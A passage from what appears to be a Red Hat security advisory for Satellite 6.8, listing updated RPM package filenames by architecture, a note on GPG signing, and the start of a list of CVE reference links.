tor-satellite-1.2.0-1.el7sat.noarch.rpm\npython3-six-1.11.0-8.el7ar.noarch.rpm\npython3-typing-extensions-3.7.4.1-2.el7ar.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nreceptor-0.6.3-1.el7ar.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nrubygem-rack-1.6.12-1.el7sat.noarch.rpm\nrubygem-rake-0.9.2.2-41.el7sat.noarch.rpm\nsatellite-6.8.0-1.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-cli-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.noarch.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.noarch.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.noarch.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.noarch.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.noarch.rpm\ntfm-rubygem-audited-4.9.0-3.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.noarch.rpm\ntfm-rubygem-builder-3.2.4-1.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-coffee-rails-5.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-coffee-script-2.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-coffee-script-source-1.12.2-4.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-connection_pool-2.2.2-2.el7sat.noarch.rpm\ntfm-rubygem-crass-1.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-css_parser-1.4.7-3.el7sat.noarch.rpm\ntfm-rubygem-daemons-1.2.3-7.el7sat.noarch.rpm\ntfm-rubygem-deacon-1.0.0-4.el7sat.noarch.rpm\ntfm-rubygem-declarative-0.0.10-1.el7sat.noarch.rpm\ntfm-rubygem-declarative-option-0.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-deep_cloneable-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-deface-1.5.3-2.el7sat.noarch.rpm\ntfm-rubygem-diffy-3.0.1-6.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-erubi-1.9.0-1.el7sat.noarch.rpm\ntfm-rubygem-excon-0.58.0-3.el7sat.noarch.rpm\ntfm-rubygem-execjs-2.7.0-4.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\ntfm-rubygem-fast_gettext-1.4.1-3.el7sat.noarch.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.noarch.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.noarch.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.noarch.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-cockpit-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.noarch.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.noarch.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.noarch.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.noarch.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.noarch.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.noarch.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.noarch.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.noarch.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.noarch.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.noarch.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.noarch.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.noarch.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.noarch.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.noarch.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.noarch.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.noarch.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.noarch.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.noarch.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.noarch.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.noarch.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_passenger-4.0.18-24.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\npython3-aiohttp-3.6.2-4.el7ar.x86_64.rpm\npython3-multidict-4.7.4-2.el7ar.x86_64.rpm\npython3-yarl-1.4.2-2.el7ar.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm\nrubygem-facter-2.4.1-2.el7sat.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nrubygem-passenger-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-3258\nhttps://access.redhat.com/security/cve/CVE-2018-11751\nhttps://access.redhat.com/security/cve/CVE-2019-12781\nhttps://access.redhat.com/security/cve/CVE-2019-16782\nhttps://access.redhat.com/security/cve/CVE-2020-5216\nhttps://access.redhat.com/security/cve/CVE-2020-5217\nhttps://access.redhat.com/security/cve/CVE-2020-5267\nhttps://access.redhat.com/security/cve/CVE-2020-7238\nhttps://access.redhat.com/security/cve/CVE-2020-7663\nhttps://access.redhat.com/security/cve/CVE-2020-7942\nhttps://access.redhat.com/security/cve/CVE-2020-7943\nhttps://access.redhat.com/security/cve/CVE-2020-8161\nhttps://access.redhat.com/security/cve/CVE-2020-8184\nhttps://access.redhat.com/security/cve/CVE-2020-8840\nhttps://access.redhat.com/security/cve/CVE-2020-9546\nhttps://access.redhat.com/security/cve/CVE-2020-9547\nhttps://access.redhat.com/security/cve/CVE-2020-9548\nhttps://access.redhat.com/security/cve/CVE-2020-10693\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11619\nhttps://access.redhat.com/security/cve/CVE-2020-14061\nhttps://access.redhat.com/security/cve/CVE-2020-14062\nhttps://access.redhat.com/security/cve/CVE-2020